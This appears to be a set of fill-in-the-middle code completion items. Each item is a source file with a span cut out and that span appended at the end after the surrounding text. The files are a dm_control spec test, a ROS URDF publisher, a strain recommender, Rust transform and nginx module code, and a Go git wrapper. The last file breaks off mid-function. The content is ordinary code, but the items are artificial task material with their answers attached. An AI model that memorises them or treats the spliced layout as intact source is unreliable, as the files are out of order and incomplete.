from absl.testing import absltest
from dm_control.rl import specs as array_spec
import numpy as np
import six
class ArraySpecTest(absltest.TestCase):
def testShapeTypeError(self):
with self.assertRaises(TypeError):
array_spec.ArraySpec(32, np.int32)
def testDtypeTypeError(self):
with self.assertRaises(TypeError):
array_spec.ArraySpec((1, 2, 3), "32")
def testStringDtype(self):
array_spec.ArraySpec((1, 2, 3), "int32")
def | (self):
array_spec.ArraySpec((1, 2, 3), np.int32)
def testDtype(self):
spec = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertEqual(np.int32, spec.dtype)
def testShape(self):
spec = array_spec.ArraySpec([1, 2, 3], np.int32)
self.assertEqual((1, 2, 3), spec.shape)
def testEqual(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertEqual(spec_1, spec_2)
def testNotEqualDifferentShape(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = array_spec.ArraySpec((1, 3, 3), np.int32)
self.assertNotEqual(spec_1, spec_2)
def testNotEqualDifferentDtype(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int64)
spec_2 = array_spec.ArraySpec((1, 2, 3), np.int32)
self.assertNotEqual(spec_1, spec_2)
def testNotEqualOtherClass(self):
spec_1 = array_spec.ArraySpec((1, 2, 3), np.int32)
spec_2 = None
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = ()
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
def testIsUnhashable(self):
spec = array_spec.ArraySpec(shape=(1, 2, 3), dtype=np.int32)
with self.assertRaisesRegexp(TypeError, "unhashable type"):
hash(spec)
def testValidateDtype(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
spec.validate(np.zeros((1, 2), dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.zeros((1, 2), dtype=np.float32))
def testValidateShape(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
spec.validate(np.zeros((1, 2), dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.zeros((1, 2, 3), dtype=np.int32))
def testGenerateValue(self):
spec = array_spec.ArraySpec((1, 2), np.int32)
test_value = spec.generate_value()
spec.validate(test_value)
class BoundedArraySpecTest(absltest.TestCase):
def testInvalidMinimum(self):
with six.assertRaisesRegex(self, ValueError, "not compatible"):
array_spec.BoundedArraySpec((3, 5), np.uint8, (0, 0, 0), (1, 1))
def testInvalidMaximum(self):
with six.assertRaisesRegex(self, ValueError, "not compatible"):
array_spec.BoundedArraySpec((3, 5), np.uint8, 0, (1, 1, 1))
def testMinMaxAttributes(self):
spec = array_spec.BoundedArraySpec((1, 2, 3), np.float32, 0, (5, 5, 5))
self.assertEqual(type(spec.minimum), np.ndarray)
self.assertEqual(type(spec.maximum), np.ndarray)
def testNotWriteable(self):
spec = array_spec.BoundedArraySpec((1, 2, 3), np.float32, 0, (5, 5, 5))
with six.assertRaisesRegex(self, ValueError, "read-only"):
spec.minimum[0] = -1
with six.assertRaisesRegex(self, ValueError, "read-only"):
spec.maximum[0] = 100
def testEqualBroadcastingBounds(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=0.0, maximum=1.0)
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertEqual(spec_1, spec_2)
def testNotEqualDifferentMinimum(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, -0.6], maximum=[1.0, 1.0])
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertNotEqual(spec_1, spec_2)
def testNotEqualOtherClass(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, -0.6], maximum=[1.0, 1.0])
spec_2 = array_spec.ArraySpec((1, 2), np.int32)
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = None
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
spec_2 = ()
self.assertNotEqual(spec_1, spec_2)
self.assertNotEqual(spec_2, spec_1)
def testNotEqualDifferentMaximum(self):
spec_1 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=0.0, maximum=2.0)
spec_2 = array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=[0.0, 0.0], maximum=[1.0, 1.0])
self.assertNotEqual(spec_1, spec_2)
def testIsUnhashable(self):
spec = array_spec.BoundedArraySpec(
shape=(1, 2), dtype=np.int32, minimum=0.0, maximum=2.0)
with self.assertRaisesRegexp(TypeError, "unhashable type"):
hash(spec)
def testRepr(self):
as_string = repr(array_spec.BoundedArraySpec(
(1, 2), np.int32, minimum=101.0, maximum=73.0))
self.assertIn("101", as_string)
self.assertIn("73", as_string)
def testValidateBounds(self):
spec = array_spec.BoundedArraySpec((2, 2), np.int32, minimum=5, maximum=10)
spec.validate(np.array([[5, 6], [8, 10]], dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.array([[5, 6], [8, 11]], dtype=np.int32))
with self.assertRaises(ValueError):
spec.validate(np.array([[4, 6], [8, 10]], dtype=np.int32))
def testGenerateValue(self):
spec = array_spec.BoundedArraySpec((2, 2), np.int32, minimum=5, maximum=10)
test_value = spec.generate_value()
spec.validate(test_value)
def testScalarBounds(self):
spec = array_spec.BoundedArraySpec((), np.float, minimum=0.0, maximum=1.0)
self.assertIsInstance(spec.minimum, np.ndarray)
self.assertIsInstance(spec.maximum, np.ndarray)
# Sanity check that numpy compares correctly to a scalar for an empty shape.
self.assertEqual(0.0, spec.minimum)
self.assertEqual(1.0, spec.maximum)
# Check that the spec doesn't fail its own input validation.
_ = array_spec.BoundedArraySpec(
spec.shape, spec.dtype, spec.minimum, spec.maximum)
if __name__ == "__main__":
absltest.main()
| testNumpyDtype |
send_urdf_fragment.py | #!/usr/bin/env python3
# Copyright (c) 2013-2018, Rethink Robotics Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import argparse
import rospy
import xacro
from intera_core_msgs.msg import (
URDFConfiguration,
)
def xacro_parse(filename):
doc = xacro.parse(None, filename)
xacro.process_doc(doc, in_order=True)
return doc.toprettyxml(indent=' ')
def send_urdf(parent_link, root_joint, urdf_filename, duration):
"""
Send the URDF Fragment located at the specified path.
@param parent_link: parent link to attach the URDF fragment to
(usually <side>_hand)
@param root_joint: root link of the URDF fragment (usually <side>_gripper_base)
@param urdf_filename: path to the urdf XML file to load into xacro and send
@param duration: duration to repeat sending the URDF to ensure it is received
"""
msg = URDFConfiguration()
    # Updating the time parameter tells the robot
    # that this is a new configuration.
# Only update the time when an updated internal
# model is required. Do not continuously update
# the time parameter.
msg.time = rospy.Time.now()
# link to attach this urdf to onboard the robot
msg.link = parent_link
# root linkage in your URDF Fragment
msg.joint = root_joint
msg.urdf = xacro_parse(urdf_filename)
# print("Publishing URDF: ", msg.urdf)
pub = rospy.Publisher('/robot/urdf', URDFConfiguration, queue_size=10)
rate = rospy.Rate(5) # 5hz
start = rospy.Time.now()
while not rospy.is_shutdown():
pub.publish(msg)
rate.sleep()
if (rospy.Time.now() - msg.time) > rospy.Duration(duration):
break
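# Illustrative usage (an assumption): attaching a gripper fragment to the
# right hand for five seconds so the on-robot model picks it up. The file
# path is a placeholder.
#
#   rospy.init_node('attach_gripper_urdf')
#   send_urdf('right_hand', 'right_gripper_base', 'gripper.urdf.xacro', 5.0)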
def main():
|
if __name__ == '__main__':
sys.exit(main())
| """RSDK URDF Fragment Example:
This example shows a proof of concept for
adding your URDF fragment to the robot's
onboard URDF (which is currently in use).
"""
arg_fmt = argparse.RawDescriptionHelpFormatter
parser = argparse.ArgumentParser(formatter_class=arg_fmt,
description=main.__doc__)
required = parser.add_argument_group('required arguments')
required.add_argument(
'-f', '--file', metavar='PATH', required=True,
help='Path to URDF file to send'
)
required.add_argument(
'-l', '--link', required=False, default="right_hand",
        help='URDF link on the robot to attach the fragment to (usually <left/right>_hand)'
)
required.add_argument(
'-j', '--joint', required=False, default="right_gripper_base",
help='Root joint for fragment (usually <left/right>_gripper_base)'
)
parser.add_argument("-d", "--duration", type=lambda t:abs(float(t)),
default=5.0, help="[in seconds] Duration to publish fragment")
args = parser.parse_args(rospy.myargv()[1:])
rospy.init_node('rsdk_configure_urdf', anonymous=True)
if not os.access(args.file, os.R_OK):
rospy.logerr("Cannot read file at '%s'" % (args.file,))
return 1
send_urdf(args.link, args.joint, args.file, args.duration)
return 0 |
recommender_vanilla.py | import numpy as np
import pandas as pd
from sklearn.neighbors import NearestNeighbors
from sklearn.feature_extraction.text import CountVectorizer
### Import and shape data
path_base = 'gitstuff/buildweek2/DS--Data-Engineering-/'
df = pd.read_csv(path_base + 'data/cannabis.csv')
## select subset with high rating
good_enough = df[df['Rating'] >= 4.0]
## replace blank flavor with ""
good_enough = good_enough.replace(np.nan, '', regex=True)
def | (strng):
"""Remove commas and parentheses."""
s = strng.replace(","," ") # comma-> space
s = s.replace("("," ") # (-> space
s = s.replace(")"," ") # (-> space
s = s.lower()
return s
## Clean and concatenate some fields to build strings for creating an embedding.
cols = ['Type', 'Effects', 'Flavor', 'Description']
for col in cols:
good_enough[col] = good_enough[col].apply(clean_string)
good_enough['text'] = good_enough['Type'] + " " + good_enough['Effects'] + " " + good_enough['Flavor']
## Define a function to create a list of docs to be used to create a sparse matrix.
def gather_docs(df):
""" Produces List of Documents from a dataframe.
df: a Pandas dataframe that has the column 'text'.
Returns a list of strings.
"""
docs = list(df['text'])
return docs
docs = gather_docs(good_enough)
## Instantiate vectorizer
vect = CountVectorizer(stop_words='english', max_features=1000)
## Fit Vectorizer
vect.fit(docs)
## Create a sparse document-term matrix
dtm = vect.transform(docs)
## Make a dataframe of a condensed version of the DTM, using feature names
dtm = pd.DataFrame(dtm.todense(), columns=vect.get_feature_names())
## Instantiate Nearestneighbors
nn = NearestNeighbors(n_neighbors=5, algorithm='kd_tree')
## Fit on Document-Term Matrix
nn.fit(dtm)
def recommend(txt):
""" Receives a string containing strain, effects, and flavors, and
returns a 2-tuple of (array of scores, array of indexes) describing
the best matches among strains modeled."""
clean_text = clean_string(txt)
transformed_text = vect.transform([clean_text])
return nn.kneighbors(transformed_text.todense()) | clean_string |
fn_transform.rs | use std::marker::PhantomData;
use futures::future::{ok, FutureResult};
use futures::IntoFuture;
use crate::{Apply, IntoTransform, Service, Transform};
/// Use function as transform service
pub fn fn_transform<F, S, In, Out, Err>(
f: F,
) -> impl Transform<S, Request = In, Response = Out::Item, Error = Out::Error, InitError = Err>
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
FnTransform::new(f)
}
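// Illustrative sketch (an assumption): wrapping a service so every request
// is inspected before being forwarded. `Request` and `MyService` are
// placeholders; the closure must return something convertible into a future
// whose error type can absorb the service's error.
//
//     let transform = fn_transform(|req: Request, srv: &mut MyService| {
//         println!("handling: {:?}", req);
//         srv.call(req)
//     });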
pub struct FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
f: F,
_t: PhantomData<(S, In, Out, Err)>,
}
impl<F, S, In, Out, Err> FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
pub fn new(f: F) -> Self {
FnTransform { f, _t: PhantomData }
}
}
impl<F, S, In, Out, Err> Transform<S> for FnTransform<F, S, In, Out, Err>
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
type Request = In;
type Response = Out::Item;
type Error = Out::Error;
type Transform = Apply<S, F, In, Out>;
type InitError = Err;
type Future = FutureResult<Self::Transform, Self::InitError>;
fn new_transform(&self, service: S) -> Self::Future {
ok(Apply::new(service, self.f.clone()))
}
}
impl<F, S, In, Out, Err> IntoTransform<FnTransform<F, S, In, Out, Err>, S> for F
where
S: Service,
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
Out::Error: From<S::Error>,
{
fn | (self) -> FnTransform<F, S, In, Out, Err> {
FnTransform::new(self)
}
}
impl<F, S, In, Out, Err> Clone for FnTransform<F, S, In, Out, Err>
where
F: FnMut(In, &mut S) -> Out + Clone,
Out: IntoFuture,
{
fn clone(&self) -> Self {
Self::new(self.f.clone())
}
}
| into_transform |
nginx_module.rs | use crate::{
nginx_utils::*,
ngx_string,
script::{EvalContext, ScriptEngine},
};
use nginx::*;
use rhai::{Dynamic, ImmutableString};
use std::{
borrow::Borrow,
collections::HashMap,
os::raw::{c_char, c_void},
ptr,
};
pub const NGX_RS_MODULE_SIGNATURE: &'static [u8; 41usize] =
b"8,4,8,0000111111010111001110101111000110\0";
#[no_mangle]
static mut commands: [ngx_command_t; 2] = [
ngx_command_t {
name: ngx_string!("open_rusty_request_filter\0"),
type_: (NGX_HTTP_LOC_CONF | NGX_CONF_TAKE1) as ngx_uint_t,
set: Some(ngx_open_rusty_request_filter_set),
conf: 16,
offset: 0,
post: std::ptr::null_mut(),
},
ngx_command_t {
name: ngx_str_t {
len: 0,
data: std::ptr::null_mut(),
},
type_: 0,
set: None,
conf: 0,
offset: 0,
post: std::ptr::null_mut(),
},
];
#[no_mangle]
static ngx_open_rusty_mod_ctx: ngx_http_module_t = ngx_http_module_t {
postconfiguration: None,
preconfiguration: None,
create_loc_conf: Some(create_loc_conf),
merge_loc_conf: Some(merge_loc_conf),
merge_srv_conf: None,
init_main_conf: None,
create_main_conf: None,
create_srv_conf: None,
};
struct LocConf {
script_engine: Option<ScriptEngine>,
}
unsafe extern "C" fn create_loc_conf(cf: *mut ngx_conf_t) -> *mut c_void {
let mut pool = Pool::from_ngx_pool((*cf).pool);
pool.allocate::<LocConf>(LocConf {
script_engine: None,
}) as *mut c_void
}
unsafe extern "C" fn merge_loc_conf(
_cf: *mut ngx_conf_t,
_prev: *mut c_void,
_conf: *mut c_void,
) -> *mut c_char {
// TODO: support merge
// let prev = &mut *(prev as *mut LocConf);
// let conf = &mut *(conf as *mut LocConf);
// if conf.script_engine.is_none() {
// conf.script_engine = prev.script_engine;
// }
ptr::null_mut()
}
#[no_mangle]
pub static mut ngx_open_rusty_mod: ngx_module_t = ngx_module_t {
ctx_index: ngx_uint_t::max_value(),
index: ngx_uint_t::max_value(),
name: std::ptr::null_mut(),
version: nginx_version as ngx_uint_t,
signature: NGX_RS_MODULE_SIGNATURE.as_ptr() as *const c_char,
ctx: &ngx_open_rusty_mod_ctx as *const _ as *mut _,
commands: unsafe { &commands[0] as *const _ as *mut _ },
type_: NGX_HTTP_MODULE as ngx_uint_t,
init_master: None,
init_module: None,
init_process: None,
init_thread: None,
exit_thread: None,
exit_process: None,
exit_master: None,
spare0: 0,
spare1: 0,
spare_hook0: 0,
spare_hook1: 0,
spare_hook2: 0,
spare_hook3: 0,
spare_hook4: 0,
spare_hook5: 0,
spare_hook6: 0,
spare_hook7: 0,
};
pub unsafe fn ngx_http_conf_get_module_loc_conf(
cf: *mut ngx_conf_t,
module: &ngx_module_t,
) -> *mut c_void {
let http_conf_ctx = (*cf).ctx as *mut ngx_http_conf_ctx_t;
*(*http_conf_ctx).loc_conf.add(module.ctx_index)
}
#[no_mangle]
unsafe extern "C" fn ngx_open_rusty_request_filter_set(
cf: *mut ngx_conf_t,
_cmd: *mut ngx_command_t,
conf: *mut c_void,
) -> *mut c_char |
pub fn get_module_loc_conf(r: *mut ngx_http_request_t, module: &ngx_module_t) -> *mut c_void {
unsafe { *(*r).loc_conf.add(module.ctx_index) }
}
#[no_mangle]
unsafe extern "C" fn open_rusty_request_filter_handler(r: *mut ngx_http_request_t) -> ngx_int_t {
let hlcf = get_module_loc_conf(r, &ngx_open_rusty_mod) as *mut LocConf;
let engine = (*hlcf).borrow();
let engine = *&engine.script_engine.as_ref().unwrap();
let mut headers: HashMap<ImmutableString, Dynamic> = HashMap::new();
for header in (*r).headers_in.into_iter() {
headers.insert(header.key().into(), header.value().into());
}
let ctx = EvalContext { headers };
let script_result = engine.run(&ctx);
match script_result {
Some(x) => x as isize,
_ => NGX_DECLINED as isize,
}
}
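// Illustrative sketch (an assumption about the intended nginx.conf usage):
// the directive registered above is NGX_HTTP_LOC_CONF | NGX_CONF_TAKE1, i.e.
// it takes a single Rhai script argument at location scope, roughly:
//
//     location / {
//         open_rusty_request_filter "<rhai script returning a status code>";
//     }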
| {
let conf = &mut *(conf as *mut LocConf);
let args = (*(*cf).args).elts as *mut ngx_str_t;
let value = NgxStr::from_ngx_str(*args.add(1));
let script = String::from(value.to_string_lossy());
conf.script_engine = Some(ScriptEngine::new(&script));
let clcf = ngx_http_conf_get_module_loc_conf(cf, &ngx_http_core_module)
as *mut ngx_http_core_loc_conf_t;
(*clcf).handler = Some(open_rusty_request_filter_handler);
ptr::null_mut()
} |
git_local.go | package gits
import (
"io"
"time"
"github.com/jenkins-x/jx/pkg/auth"
gitcfg "gopkg.in/src-d/go-git.v4/config"
)
// GitLocal provides a semi-fake Gitter - local operations delegate to GitCLI but remote operations are delegated to
// FakeGit. When using it in tests you must make sure you are operating on a temporary copy of a git repo NOT the
// real one on your disk (as it will get changed!).
// Faked out methods have the comment "Faked out"
type GitLocal struct {
GitCLI *GitCLI
GitFake *GitFake
}
// NewGitLocal creates a new GitLocal instance
func NewGitLocal() *GitLocal |
// FindGitConfigDir tries to find the `.git` directory either in the current directory or in parent directories
func (g *GitLocal) FindGitConfigDir(dir string) (string, string, error) {
return g.GitCLI.FindGitConfigDir(dir)
}
// Config executes the git config command with the given arguments in the given directory
func (g *GitLocal) Config(dir string, args ...string) error {
return g.GitCLI.Config(dir, args...)
}
// Clone clones the given git URL into the given directory
// Faked out
func (g *GitLocal) Clone(url string, dir string) error {
return g.GitFake.Clone(url, dir)
}
// ShallowCloneBranch clones a single branch of the given git URL into the given directory
// Faked out
func (g *GitLocal) ShallowCloneBranch(url string, branch string, dir string) error {
return g.GitFake.ShallowCloneBranch(url, branch, dir)
}
// ShallowClone shallow clones the repo at url from the specified commitish or pull request to a local master branch
// Faked out
func (g *GitLocal) ShallowClone(dir string, url string, commitish string, pullRequest string) error {
return g.GitFake.ShallowClone(dir, url, commitish, pullRequest)
}
// Pull pulls the Git repository in the given directory
// Faked out
func (g *GitLocal) Pull(dir string) error {
return g.GitFake.Pull(dir)
}
// PullRemoteBranches pulls the remote Git branches from the given directory
// Faked out
func (g *GitLocal) PullRemoteBranches(dir string) error {
return g.GitFake.PullRemoteBranches(dir)
}
// DeleteRemoteBranch deletes the remote branch in the given directory
// Faked out
func (g *GitLocal) DeleteRemoteBranch(dir string, remoteName string, branch string) error {
return g.GitFake.DeleteRemoteBranch(dir, remoteName, branch)
}
// DeleteLocalBranch deletes a local branch
func (g *GitLocal) DeleteLocalBranch(dir string, branch string) error {
return g.GitFake.DeleteLocalBranch(dir, branch)
}
// CloneOrPull clones the given git URL or pull if it already exists
// Faked out
func (g *GitLocal) CloneOrPull(url string, dir string) error {
return g.GitFake.CloneOrPull(url, dir)
}
// PullUpstream pulls the remote upstream branch into the master branch in the given directory
// Faked out
func (g *GitLocal) PullUpstream(dir string) error {
return g.GitFake.PullUpstream(dir)
}
// ResetToUpstream resets the given branch to the upstream version
func (g *GitLocal) ResetToUpstream(dir string, branch string) error {
return g.GitFake.ResetToUpstream(dir, branch)
}
// AddRemote adds a remote repository at the given URL and with the given name
func (g *GitLocal) AddRemote(dir string, name string, url string) error {
return g.GitCLI.AddRemote(dir, name, url)
}
// UpdateRemote updates the URL of the remote repository
func (g *GitLocal) UpdateRemote(dir, url string) error {
return g.GitCLI.UpdateRemote(dir, url)
}
// StashPush stashes the current changes from the given directory
func (g *GitLocal) StashPush(dir string) error {
return g.GitCLI.StashPush(dir)
}
// CheckoutRemoteBranch checks out the given remote tracking branch
func (g *GitLocal) CheckoutRemoteBranch(dir string, branch string) error {
return g.GitCLI.CheckoutRemoteBranch(dir, branch)
}
// RemoteBranches returns the remote branches
func (g *GitLocal) RemoteBranches(dir string) ([]string, error) {
return g.GitCLI.RemoteBranches(dir)
}
// Checkout checks out the given branch
func (g *GitLocal) Checkout(dir string, branch string) error {
return g.GitCLI.Checkout(dir, branch)
}
// CheckoutCommitFiles checks out the given files
func (g *GitLocal) CheckoutCommitFiles(dir string, commit string, files []string) error {
return g.GitCLI.CheckoutCommitFiles(dir, commit, files)
}
// CheckoutOrphan checks out the given branch as an orphan
func (g *GitLocal) CheckoutOrphan(dir string, branch string) error {
return g.GitCLI.CheckoutOrphan(dir, branch)
}
// Init inits a git repository into the given directory
func (g *GitLocal) Init(dir string) error {
return g.GitCLI.Init(dir)
}
// Remove removes the given file from a Git repository located at the given directory
func (g *GitLocal) Remove(dir, fileName string) error {
return g.GitCLI.Remove(dir, fileName)
}
// RemoveForce removes the given file from a git repository located at the given directory
func (g *GitLocal) RemoveForce(dir, fileName string) error {
return g.GitCLI.RemoveForce(dir, fileName)
}
// CleanForce cleans a git repository located at a given directory
func (g *GitLocal) CleanForce(dir, fileName string) error {
	return g.GitCLI.CleanForce(dir, fileName)
}
// Status returns the status of the git repository at the given directory
func (g *GitLocal) Status(dir string) error {
return g.GitCLI.Status(dir)
}
// Branch returns the current branch of the repository located at the given directory
func (g *GitLocal) Branch(dir string) (string, error) {
return g.GitCLI.Branch(dir)
}
// Push pushes the changes from the repository at the given directory
// Faked out
func (g *GitLocal) Push(dir string, remote string, force bool, refspec ...string) error {
return g.GitFake.Push(dir, "origin", false)
}
// ForcePushBranch does a force push of the local branch into the remote branch of the repository at the given directory
// Faked out
func (g *GitLocal) ForcePushBranch(dir string, localBranch string, remoteBranch string) error {
return g.GitFake.ForcePushBranch(dir, localBranch, remoteBranch)
}
// PushMaster pushes the master branch into the origin
// Faked out
func (g *GitLocal) PushMaster(dir string) error {
return g.GitFake.PushMaster(dir)
}
// PushTag pushes the given tag into the origin
// Faked out
func (g *GitLocal) PushTag(dir string, tag string) error {
return g.GitFake.PushTag(dir, tag)
}
// Add does a git add for all the given arguments
func (g *GitLocal) Add(dir string, args ...string) error {
return g.GitCLI.Add(dir, args...)
}
// HasChanges indicates if there are any changes in the repository from the given directory
func (g *GitLocal) HasChanges(dir string) (bool, error) {
return g.GitCLI.HasChanges(dir)
}
// HasFileChanged returns true if file has changes in git
func (g *GitLocal) HasFileChanged(dir string, fileName string) (bool, error) {
return g.GitCLI.HasFileChanged(dir, fileName)
}
// CommitIfChanges does a commit if there are any changes in the repository at the given directory
func (g *GitLocal) CommitIfChanges(dir string, message string) error {
return g.GitCLI.CommitIfChanges(dir, message)
}
// CommitDir commits all changes from the given directory
func (g *GitLocal) CommitDir(dir string, message string) error {
return g.GitCLI.CommitDir(dir, message)
}
// AddCommit performs an add and commit of the changes from the repository at the given directory with the given message
func (g *GitLocal) AddCommit(dir string, msg string) error {
return g.GitCLI.AddCommit(dir, msg)
}
// CreateAuthenticatedURL creates the Git repository URL with the username and password encoded for HTTPS based URLs
func (g *GitLocal) CreateAuthenticatedURL(cloneURL string, userAuth *auth.UserAuth) (string, error) {
return g.GitCLI.CreateAuthenticatedURL(cloneURL, userAuth)
}
// AddCommitFiles add files to a commit
func (g *GitLocal) AddCommitFiles(dir string, msg string, files []string) error {
return g.GitCLI.AddCommitFiles(dir, msg, files)
}
// RepoName formats the repository names based on the organization
func (g *GitLocal) RepoName(org, repoName string) string {
return g.GitCLI.RepoName(org, repoName)
}
// Server returns the Git server of the repository at the given directory
func (g *GitLocal) Server(dir string) (string, error) {
return g.GitCLI.Server(dir)
}
// Info returns the git info of the repository at the given directory
func (g *GitLocal) Info(dir string) (*GitRepository, error) {
return g.GitCLI.Info(dir)
}
// ConvertToValidBranchName converts the given branch name into a valid git branch string
// replacing any dodgy characters
func (g *GitLocal) ConvertToValidBranchName(name string) string {
return g.GitCLI.ConvertToValidBranchName(name)
}
// FetchBranch fetches a branch
// Faked out
func (g *GitLocal) FetchBranch(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranch(dir, repo, refspec...)
}
// FetchBranchShallow fetches a branch
// Faked out
func (g *GitLocal) FetchBranchShallow(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranchShallow(dir, repo, refspec...)
}
// FetchBranchUnshallow fetches a branch
// Faked out
func (g *GitLocal) FetchBranchUnshallow(dir string, repo string, refspec ...string) error {
return g.GitFake.FetchBranch(dir, repo, refspec...)
}
// GetAuthorEmailForCommit returns the author email from commit message with the given SHA
func (g *GitLocal) GetAuthorEmailForCommit(dir string, sha string) (string, error) {
return g.GitCLI.GetAuthorEmailForCommit(dir, sha)
}
// SetRemoteURL sets the remote URL of the remote with the given name
func (g *GitLocal) SetRemoteURL(dir string, name string, gitURL string) error {
return g.GitCLI.SetRemoteURL(dir, name, gitURL)
}
// DiscoverRemoteGitURL discovers the remote git URL from the given git configuration
func (g *GitLocal) DiscoverRemoteGitURL(gitConf string) (string, error) {
return g.GitCLI.DiscoverRemoteGitURL(gitConf)
}
// DiscoverUpstreamGitURL discovers the upstream git URL from the given git configuration
func (g *GitLocal) DiscoverUpstreamGitURL(gitConf string) (string, error) {
return g.GitCLI.DiscoverUpstreamGitURL(gitConf)
}
// GetRemoteUrl returns the remote URL from the given git config
func (g *GitLocal) GetRemoteUrl(config *gitcfg.Config, name string) string {
return g.GitCLI.GetRemoteUrl(config, name)
}
// RemoteBranchNames returns all remote branch names with the given prefix
func (g *GitLocal) RemoteBranchNames(dir string, prefix string) ([]string, error) {
return g.GitCLI.RemoteBranchNames(dir, prefix)
}
// RemoteMergedBranchNames returns all merged remote branch names with the given prefix
func (g *GitLocal) RemoteMergedBranchNames(dir string, prefix string) ([]string, error) {
return g.GitCLI.RemoteMergedBranchNames(dir, prefix)
}
// GetCommitPointedToByPreviousTag returns the previous git tag from the repository at the given directory
func (g *GitLocal) GetCommitPointedToByPreviousTag(dir string) (string, string, error) {
return g.GitCLI.GetCommitPointedToByPreviousTag(dir)
}
// GetRevisionBeforeDate returns the revision before the given date
func (g *GitLocal) GetRevisionBeforeDate(dir string, t time.Time) (string, error) {
return g.GitCLI.GetRevisionBeforeDate(dir, t)
}
// GetRevisionBeforeDateText returns the revision before the given date in format "MonthName dayNumber year"
func (g *GitLocal) GetRevisionBeforeDateText(dir string, dateText string) (string, error) {
return g.GitCLI.GetRevisionBeforeDateText(dir, dateText)
}
// GetCommitPointedToByLatestTag returns the SHA of the current git tag from the repository at the given directory
func (g *GitLocal) GetCommitPointedToByLatestTag(dir string) (string, string, error) {
return g.GitCLI.GetCommitPointedToByLatestTag(dir)
}
// GetCommitPointedToByTag returns the SHA of the commit pointed to by the given git tag
func (g *GitLocal) GetCommitPointedToByTag(dir string, tag string) (string, error) {
return g.GitCLI.GetCommitPointedToByTag(dir, tag)
}
// GetLatestCommitMessage returns the latest git commit message
func (g *GitLocal) GetLatestCommitMessage(dir string) (string, error) {
return g.GitCLI.GetLatestCommitMessage(dir)
}
// FetchTags fetches all the tags
// Faked out
func (g *GitLocal) FetchTags(dir string) error {
return g.GitFake.FetchTags(dir)
}
// FetchRemoteTags fetches all the tags from a remote repository
// Faked out
func (g *GitLocal) FetchRemoteTags(dir string, repo string) error {
return g.GitFake.FetchRemoteTags(dir, repo)
}
// Tags returns all tags from the repository at the given directory
func (g *GitLocal) Tags(dir string) ([]string, error) {
return g.GitCLI.Tags(dir)
}
// FilterTags returns all tags from the repository at the given directory that match the filter
func (g *GitLocal) FilterTags(dir string, filter string) ([]string, error) {
return g.GitCLI.FilterTags(dir, filter)
}
// CreateTag creates a tag with the given name and message in the repository at the given directory
func (g *GitLocal) CreateTag(dir string, tag string, msg string) error {
return g.GitCLI.CreateTag(dir, tag, msg)
}
// PrintCreateRepositoryGenerateAccessToken prints the access token URL of a Git repository
func (g *GitLocal) PrintCreateRepositoryGenerateAccessToken(server *auth.AuthServer, username string, o io.Writer) {
g.GitCLI.PrintCreateRepositoryGenerateAccessToken(server, username, o)
}
// IsFork indicates if the repository at the given directory is a fork
func (g *GitLocal) IsFork(dir string) (bool, error) {
return g.GitCLI.IsFork(dir)
}
// Version returns the git version
func (g *GitLocal) Version() (string, error) {
return g.GitCLI.Version()
}
// Username returns the username from the git configuration
// Faked out
func (g *GitLocal) Username(dir string) (string, error) {
// Use GitFake as this is a global setting
return g.GitFake.Username(dir)
}
// SetUsername sets the username in the git configuration
// Faked out
func (g *GitLocal) SetUsername(dir string, username string) error {
// Use GitFake as this is a global setting
return g.GitFake.SetUsername(dir, username)
}
// Email returns the email from the git configuration
// Faked out
func (g *GitLocal) Email(dir string) (string, error) {
// Use GitFake as this is a global setting
return g.GitFake.Email(dir)
}
// SetEmail sets the given email in the git configuration
// Faked out
func (g *GitLocal) SetEmail(dir string, email string) error {
// Use GitFake as this is a global setting
return g.GitFake.SetEmail(dir, email)
}
// CreateBranch creates a branch with the given name in the Git repository from the given directory
func (g *GitLocal) CreateBranch(dir string, branch string) error {
return g.GitCLI.CreateBranch(dir, branch)
}
// Diff runs git diff
func (g *GitLocal) Diff(dir string) (string, error) {
return g.GitCLI.Diff(dir)
}
// ListChangedFilesFromBranch lists files changed between branches
func (g *GitLocal) ListChangedFilesFromBranch(dir string, branch string) (string, error) {
